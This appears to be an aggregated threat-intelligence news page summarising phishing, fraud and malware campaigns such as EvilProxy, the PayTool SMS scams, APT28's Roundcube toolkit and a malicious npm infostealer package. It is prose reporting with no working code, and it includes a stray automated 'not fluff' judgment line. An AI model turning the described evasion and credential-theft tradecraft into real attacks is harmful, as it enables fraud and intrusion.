Phishing and fraud campaigns abusing trusted infrastructure and communications
Threat actors are increasingly improving phishing success rates by abusing trusted channels and infrastructure rather than relying on generic lures. One observed intrusion hijacked an active executive email thread via a compromised contractor account, allowing the attacker to reply inline with a link to a Microsoft 365 lookalike login flow; analysis of detonated samples indicated use of the EvilProxy adversary-in-the-middle phishkit, with layered anti-bot gating (e.g., Cloudflare Turnstile) and dynamic HTML/PDF content to capture credentials without exploiting software vulnerabilities. Separately, Rapid7 documented a cloud-abuse incident where attackers used compromised AWS credentials to stand up phishing/spam operations using AWS WorkMail, leveraging Amazon’s sender reputation and sidestepping typical SES anti-abuse controls while generating limited, service-native telemetry that can blend into normal administrative activity.
A parallel, large-scale consumer fraud operation aligned with the “PayTool” ecosystem was reported targeting Canadian residents through SMS-driven lures (e.g., unpaid fines) that route victims through high-fidelity impersonations of the Government of Canada, Air Canada, and Canada Post, including province-selection workflows designed to mimic legitimate federal-to-provincial service handoffs before directing victims to localized scam domains. In contrast, LevelBlue SpiderLabs’ write-up is broader sector telemetry on education-targeted attacks (e.g., brute force T1110, credential dumping T1003, Kerberos ticket forgery T1558) and does not describe the same specific phishing/fraud campaigns, though it reinforces that credential theft remains a dominant initial access path across industries.
Related Entities
Threat Actors
Malware
Organizations
Sources
Related Stories
Phishing Campaigns Abuse Trusted Platforms and Collaboration Tools to Steal Credentials
Multiple reports describe a broader **credential-theft trend** in which attackers abuse trusted services and familiar business workflows to make phishing more convincing and harder to detect. One campaign used **compromised WordPress sites** and redirects through `skimresources[.]com` to deliver pixel-perfect fake login pages for **Microsoft Teams**, **Xfinity**, and **UAE Pass**, with lures such as missed voicemail and shared-document alerts. Another campaign abused **LiveChat**'s `lc[.]chat` infrastructure to impersonate brands like **PayPal** and **Amazon**, moving victims into fake support conversations designed to extract sensitive information under the guise of refunds or order issues. A separate industry report reinforces the same operational pattern: attackers increasingly rely on **valid credentials** and trusted collaboration tools rather than software exploits, with cloud identity compromise driving most investigated incidents and some intrusions using **Microsoft Teams voice phishing** and **Quick Assist** to gain access, move laterally, and deploy ransomware. Other references in the set cover different stories entirely, including the **CamelClone** espionage operation, a **FancyBear/APT28** infrastructure exposure, and a general weekly security recap, and do not describe the same phishing activity. This is **not fluff** because the relevant items contain substantive threat intelligence on active attack methods, delivery infrastructure, and attacker tradecraft.
Today
Credential Theft and Evasion Techniques Across Phishing, Webmail Exploitation, and Commodity Malware
Threat actors are continuing to prioritize **credential theft** while using defensive and trusted services to evade detection. DomainTools reported a Microsoft 365 phishing operation that **weaponizes Cloudflare protections** (including *Turnstile* human verification) to block automated analysis and security crawlers, then selectively serves a credential-harvesting flow only to “clean” visitors. The infrastructure used additional gatekeeping such as IP reputation checks (including lookups via `api.ipify.org`), hardcoded blocks for security-vendor and cloud-provider ranges, and user-agent filtering that returns a fake `404` page to bots, with the theft logic hidden behind heavy obfuscation. Separately, Hunt.io documented **Operation Roundish**, assessed with medium-high confidence as aligned to **APT28 (Fancy Bear)**, after discovering an exposed open directory hosting a Roundcube exploitation toolkit used against Ukrainian targets (including `mail.dmsu.gov.ua`). The toolkit included XSS payloads, a Flask-based C2, and modules for credential harvesting, mail forwarding persistence, bulk email exfiltration, address book theft, and 2FA secret extraction, plus a Go-based Linux implant (`httd`) found on a compromised Ukrainian web application. In parallel reporting on credential-access tradecraft, Flashpoint analysis highlighted the low-cost **DarkCloud infostealer** (sold for about **$30**) that steals browser logins/cookies and other data and exfiltrates via common channels (email/FTP/Telegram/HTTP), while Aryaka Threat Labs described the **BlackSanta** campaign using steganographic lures and **BYOVD** techniques to disable EDR and enable stealthy data theft over HTTPS—underscoring that credential access and defense evasion remain common precursors to broader enterprise compromise.
5 days ago
Multi-stage phishing and supply-chain malware campaigns targeting credentials and long-term access
Multiple reports highlight active campaigns using *phishing* and *software supply-chain abuse* to steal credentials and establish persistence. eSentire described an espionage-focused operation targeting residents of India with emails impersonating the Income Tax Department, leading victims to a malicious archive that uses DLL side-loading with a legitimate signed Microsoft application, extensive anti-analysis checks, in-memory shellcode unpacking, UAC bypass, and process masquerading; the payload was identified as a **Blackmoon**-family variant that specifically attempts to disable **Avast Free Antivirus** by automating UI interactions to add exclusions. Separately, Aikido reported a malicious npm package (`ansi-universal-ui`) that deploys a multi-stage infostealer (“**G_Wagon**”) by abusing `postinstall` execution, downloading a Python runtime, running an obfuscated payload, and exfiltrating browser credentials, cloud credentials, Discord tokens, and data from 100+ cryptocurrency wallets to an Appwrite storage bucket; it also includes a Windows DLL used for browser-process injection via NT native APIs. In parallel, network-edge exploitation remains a key access vector: Risky Business reported a renewed wave of attacks against **Fortinet FortiGate** devices via a vulnerability Fortinet allegedly “patched” in December but which attackers can still exploit, enabling SSO authentication bypass (via crafted SAML), creation of new admin accounts, and theft of device configuration; mitigations include disabling the FortiCloud SSO feature (not enabled by default). Several other items are general awareness or roundup content rather than specific incident reporting: TechTarget and other blogs emphasized ongoing phishing/email risk (including relay spam abusing legitimate Zendesk instances) and password hygiene, while The Hacker News published a multi-story bulletin that includes (among other items) a spear-phishing campaign in Afghanistan delivering a FALSECUB backdoor via a GitHub-hosted ISO and LNK execution chain; Risky Business also covered Iran’s internet blackout and Starlink jamming/spoofing as a communications-control issue rather than an enterprise cyber incident.
1 months ago